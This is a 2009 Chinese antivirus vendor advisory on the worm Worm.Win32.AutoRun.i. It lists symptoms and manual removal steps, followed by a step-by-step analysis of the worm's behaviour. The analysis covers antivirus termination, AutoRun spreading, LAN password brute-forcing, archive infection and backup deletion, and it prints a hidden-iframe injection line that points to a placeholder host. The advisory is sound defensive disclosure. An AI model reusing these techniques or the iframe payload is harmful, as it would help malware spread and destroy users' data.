"中華吸血鬼"新變種
Worm.Win32.AutoRun.i
捕獲時間
2009-10-15
危害等級
高
病毒癥狀
該樣本是使用“VC”編寫的蠕蟲病毒,由微點主動防御軟件自動捕獲,采用“FSG”加殼方式,企圖躲避特征碼掃描,加殼后長度為“16,897 字節 ”,圖標為“
”,病毒擴展名為“exe”,主要通過“文件捆綁”、“下載器下載”、“移動存儲介質”、“網頁掛馬”等方式傳播,病毒主要目的為下載大量病毒并運行。
用戶中毒后,會出現大多數殺毒軟件退出和無法正常運行、系統運行緩慢、網絡速度變緩、無法進入安全模式、金山毒霸無法在線升級、打開網頁始終訪問同一個網址、許多反病毒論壇網頁無法打開、出現大量未知進程等現象。
感染對象
Windows 2000/Windows XP/Windows 2003/Vista
傳播途徑
網頁木馬、文件捆綁、下載器下載
防范措施
已安裝使用微點主動防御軟件的用戶,無須任何設置,微點主動防御將自動保護您的系統免受該病毒的入侵和破壞。無論您是否已經升級到最新版本,微點主動防御都能夠有效清除該病毒。如果您沒有將微點主動防御軟件升級到最新版,微點主動防御軟件在發現該病毒后將報警提示您發現“未知木馬”,請直接選擇刪除處理(如圖1);
圖1 微點主動防御軟件自動捕獲未知病毒(未升級)
如果您已經將微點主動防御軟件升級到最新版本,微點將報警提示您發現"Worm.Win32.AutoRun.i”,請直接選擇刪除(如圖2)。
圖2 微點主動防御軟件升級后截獲已知病毒
未安裝微點主動防御軟件的手動解決辦法:
1、手動恢復以下文件:
全盤刪除所有壓縮包中名為”安裝.bat”的病毒文件。
全盤刪除所有網頁文件中的以下代碼:
<iframe src=http://www.xx.cn/1.htm width=0 height=0></iframe>
全盤刪除所有文件夾下名為wsock32.dll的文件
拷貝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts
2、手動刪除以下文件:
%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安裝.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe (X為系統各個盤符)
3、手動刪除以下注冊表鍵值:
鍵: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
值: {H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
4、手動修復以下注冊表鍵值:
修復安全模式:
鍵: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
修復腳本顯示:
鍵:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
值: ActiveDebugging 數據:1
值: DisplayLogo 數據:1
值: SilentTerminate 數據:0
值:UseWINSAFER 數據:1
變量聲明:
%SystemDriver% 系統所在分區,通常為“C:\”
%SystemRoot% WINDODWS所在目錄,通常為“C:\Windows”
%Documents and Settings% 用戶文檔目錄,通常為“C:\Documents and Settings”
%Temp% 臨時文件夾,通常為“C:\Documents and Settings\當前用戶名稱\Local Settings\Temp”
%ProgramFiles% 系統程序默認安裝目錄,通常為:“C:\ProgramFiles”
病毒分析
(1)創建目錄%SystemRoot%\ini,并設置目錄屬性為隱藏, 釋放文件%SystemRoot%\ini\ini.exe,并執行。
(2)創建互斥體,防止重復運行。
(3)獲得當前進程列表,檢測大多數反病毒軟件進程,一旦找到,終止目標進程,并監視窗口文本,發現相匹配的關鍵字便發送一個
窗口退出消息將目標窗口退出。
(4) 在每個盤符下生成文件AutoRun.inf,并創建目錄 recycle.{645FF040-5081-101B-9F08-00AA002F954E},將
%SystemRoot%\ini\ini.exe復制到recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe,并設置為隱藏,使用戶每次雙擊
磁盤和打開資源管理器時自動運行病毒
(5)刪除注冊表相關鍵值,使病毒可以悄無聲息的執行腳本程序。并創建病毒自己的注冊表項,使其成為Windows的活動組件,當用戶
安裝組件時,會自動執行病毒的腳本程序。接著釋放腳本文件%SystemRoot%\ini\shit.vbs,運行該腳本后,將執行病毒程序%SystemRoot%\ini\ini.exe。
(6)全盤查找后綴名為"html、htm、asp、aspx、php、jsp"格式的網頁文件,如果找到,往目標文件中插入類似<iframe src=http://www.xx.cn/1.htm width=0 height=0></iframe>的惡意代碼,并搜索后綴名為"gho、GHO、Gho"的文件,一旦找到,將其刪除。使用戶丟失系統備份數據。
(7)掃描局域網內其它主機IP地址,并嘗試通過匹配弱口令的方式窮舉出用戶管理員密碼。如果窮舉成功,則將
%SystemRoot%\ini\ini.exe重命名為kav32.exe復制到目標主機的每個共享目錄下,并設置成在某一時間執行該病毒。
(8)病毒通過加載系統核心文件NTDLL.DLL,獲得相關API函數虛擬地址,操作PhysicalMemory內核對象,并提升權限,從而實現對物理內存的直接讀寫操作。
(9)病毒將%SystemRoot%\ini\ini.exe重命名后復制到%SystemRoot%\Tasks\安裝.bat,并全盤查找后綴名為"rar、zip、tgz、tar"的壓縮包文件,一旦找到,利用%ProgramFiles%\WinRAR\Rar.exe程序將目標壓縮包解壓,將病毒程序"安裝.bat"復制到解壓出來的文件夾中,然后再壓縮回去,完成將病毒添加到壓縮包的功能
(10)訪問目標網址,下載資源文件到%TEMP%\configmon.dat文件中,并訪問資源網址,下載大量病毒到本地運行。并統計被感染主機相關信息,發送到指定網址。
(11)釋放動態鏈接庫%SystemRoot%\ini\wsock32.dll,并遍歷所有磁盤文件夾,將文件%SystemRoot%\ini\wsock32.dll復制到每一個找到的文件夾下,并設置該文件屬性為隱藏。
(12)釋放文件%SystemDriver%\__default.pif,訪問網絡下載病毒更新程序,并執行,達到更新病毒自身的目的,
并刪除文件%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT和%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT使金山毒霸無法在線升級,并修改%SystemRoot%\System32\drivers\etc\hosts文件。
(13)刪除注冊表自啟動項下的所有鍵值,并通過刪除注冊表對應鍵值破壞安全模式。
(14) 創建文件%SystemRoot%\ini\desktop.ini,寫入desktop.ini,將其偽裝成回收站,并設置為隱藏,用來隱藏自身。
(15)刪除自身,退出進程。
病毒創建文件:
%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安裝.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe (X為系統各個盤符)
病毒修改文件:
%SystemRoot%\system32\drivers\etc\hosts
病毒刪除文件:
%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT
%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT
X:\*.GHO (X為系統各盤符,*.GHO表示所有的GHO文件)
病毒創建注冊表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2- 9CBD-0O00FS7AH6-9E2121BHJLK}
病毒刪除注冊表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[所有程序]
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
病毒訪問網絡:
http://****/get.asp
http://****/me.exe
http://pc.sk**ne.cn/gr.txt
